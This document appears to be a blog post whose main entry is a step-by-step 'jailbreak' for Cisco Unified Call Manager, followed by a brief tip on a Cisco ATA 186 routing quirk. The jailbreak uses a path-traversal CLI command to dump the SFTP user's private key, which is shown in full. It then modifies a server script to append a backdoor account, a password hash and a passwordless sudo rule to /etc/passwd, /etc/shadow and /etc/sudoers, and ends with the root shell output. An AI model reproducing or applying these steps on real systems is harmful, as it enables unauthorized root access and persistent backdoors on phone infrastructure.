Jailbreak Cisco Unified Call Manager

Jailbreak Cisco Unified Call Manager

  1. Connect to the administrator CLI using SSH
  2. Run the command file dump sftpdetails ../.ssh/id_dsa. This should give you the private key of the SFTP user:
    admin:file dump sftpdetails ../.ssh/id_dsa
    -----BEGIN DSA PRIVATE KEY-----
    MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
    6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
    +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
    saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
    a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
    bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
    JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
    5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
    fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
    PSfhcQWR3rOKaYUD85henvE=
    -----END DSA PRIVATE KEY-----
    
  3. Create a file on your local machine, containing the private key just obtained. We will use c:\temp\id.ots in this example.
    C:\>copy con c:\temp\id.ots
    -----BEGIN DSA PRIVATE KEY-----
    MIIBvQIBAAKBgQDD4rRO0aI3VTsEYIo48zHDipw7AXR+QmEVsSevdtNNMmWbFeHl
    6aQF7VzwoLzfa1eVpXwGCbk7m1/u7wY/mJNsrClNaPWfa0MbNFPdOI0o4IUA+LNO
    +6GNbDbWMPAdiuV0S/fyg7wUc2DcKTZX6mQuWbGaGbLk2bN1RxkVzqi4vQIVAJaq
    saqLZ10dIsbfk04LaOgxgkZBAoGBAKGquSl92E/ZMmQI/SzhPO9p0uyfhZR8uR2M
    a3R60EP1HyTg+DO6M8REzOSm1PTWpvr0XFAQULfxGZQyjcARIYPmmBSrqz7ETS3y
    bmZcJ19a38H1L2EUuOCO8A3q70NK2DMPoYBf6JV+b77shpz7aE+1Xd0rL3Tyqtzj
    JOFsyxkSAoGBAKmWRxB/pwGtu1eFc5Eb5xCRmVB7JP9xDpqW/DIz2LTxoZBSMRcJ
    5UdZ7ewVGIXYOjKvcR/ua3n6UBa0wBmYuHJ5erjpAHoR0JUjfpz9ONiX47OAKDav
    fLD2lIqnxzUz+QmHUVRiwcjd2AZhyzfChS40/9tKbBaqC2QYki7NKyfzAhUAhuPE
    PSfhcQWR3rOKaYUD85henvE=
    -----END DSA PRIVATE KEY-----
    ^Z
            1 file(s) copied.
    
  4. If you are using PuTTY, you will have to change the key format from OpenSSH to PuTTY using:
    C:\> puttygen c:\TEMP\id.ots
    

    Save the private key (with or without passphrase) to another file, e.g. c:\temp\id.ppk.

  5. Employ your favorite SFTP tool to connect as sftpuser to your CUCM. Here, we are using psftp.exe from the PuTTY team:
    C:\>psftp -2 -i c:\TEMP\id.ppk [email protected]
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp>
    
  6. Get the file sftp_connect.sh:
    psftp> get sftp_connect.sh
    remote:/home/sftpuser/sftp_connect.sh => local:sftp_connect.sh
    psftp>exit
    
  7. You can open the file locally now in your favorite editor. Add the following lines after the first line. Make sure that your editor understands the difference between Windows and UNIX line endings! You can use UltraEdit for that task.
    chattr -i /etc/passwd
    chattr -i /etc/shadow
    echo 'jail:x:1337:1337::/tmp:/bin/bash' >> /etc/passwd
    echo 'jail:$1$knkuI5HP$sNn3SJJ/95E.9iD.vvnyw.:14714:1:99999:7:::' >> /etc/shadow
    echo 'jail ALL=(root) NOPASSWD: /bin/bash' >> /etc/sudoers
    chattr +i /etc/passwd
    chattr +i /etc/shadow
    
  8. Now we connect using the sftpuser again and replace the file sftp_connect.sh:
    C:\TEMP\>psftp -2 -i c:\TEMP\id.ppk [email protected]
    Using username "sftpuser".
    Remote working directory is /home/sftpuser
    psftp> del sftp_connect.sh
    rm /home/sftpuser/sftp_connect.sh: OK
    psftp> put sftp_connect.sh
    local:sftp_connect.sh => remote:/home/sftpuser/sftp_connect.sh
    psftp> chmod 555 sftp_connect.sh
    /home/sftpuser/sftp_connect.sh: 0644 -> 0555
    psftp>exit
    
  9. Back in the CUCM administrator CLI, we execute the command file get tftp os7920.txt to trigger our enhanced script. Yes, the command line says TFTP, not SFTP, that’s correct. Never mind. It doesn’t actually matter what you answer to the CLI questions, as long as the file (e.g. os7920.txt) exists and you answer y to the first question.
    admin:file get tftp os7920.txt
    Please wait while the system is gathering files info ...done.
    Sub-directories were not traversed.
    Number of files affected: 1
    Total size in Bytes: 22
    Total size in Kbytes: 0.021484375
    Would you like to proceed [y/n]? y
    SFTP server IP: doesNotMatter
    SFTP server port [22]:
    User ID: SoonToBeRoot
    Password: ***
    
    Download directory: InYourFace
    
    Could not connect to host doesNotMatter on port 22. Please verify SFTP settings.
    admin:
    
  10. Finally, you can connect to your CUCM using SSH, the user name jail and the password break and elevate your privileges by using sudo /bin/bash:
    login as: jail
    [email protected]'s password:
    
    -bash-3.00$ sudo /bin/bash
    bash-3.00# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    bash-3.00#
    
Cisco ATA 186 and 10.1.1.1

Cisco ATA 186 and 10.1.1.1

If you notice any issues on your firewall regarding your ATA 186, it’s most likely because of a factory hardware error that causes the ATA to try to create a route to a nonexistent CCM at 10.1.1.1 as a backup. Find the IP of your ATA and type it in your browser and add /dev behind the url. On the SCCP page, change both CCM addresses to your addresses. If you only have 1 CCM, put it in both boxes.